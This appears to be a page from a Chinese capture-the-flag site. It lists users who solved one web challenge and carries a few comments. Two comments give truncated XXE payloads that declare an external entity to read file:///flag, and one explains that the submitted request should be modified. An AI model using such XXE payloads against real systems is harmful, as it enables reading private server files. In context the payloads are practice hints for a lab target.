评分(0)
暂无评分
解题动态
Zpfhh 攻破了该题 1月前
1424661428 攻破了该题 1月前
caocao 攻破了该题 1月前
minz 攻破了该题 3月前
xujunjjj 攻破了该题 3月前
wbiao 攻破了该题 5月前
nuxe 攻破了该题 5月前
ssoocc 攻破了该题 6月前
倦鸟叫了一整天 攻破了该题 8月前
amobaishi 攻破了该题 1年前
biandanjun 攻破了该题 1年前
tianna 攻破了该题 1年前
coldplay99999 攻破了该题 1年前
Rg 攻破了该题 1年前
WCRH 攻破了该题 1年前
POEighT 攻破了该题 1年前
wangjf 攻破了该题 1年前
t1tl3d 攻破了该题 1年前
fuhuameng 攻破了该题 1年前
评论
MRLD 1年前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 1年前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 2年前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 2年前
举报
找半天结果假flag是真的,很迷惑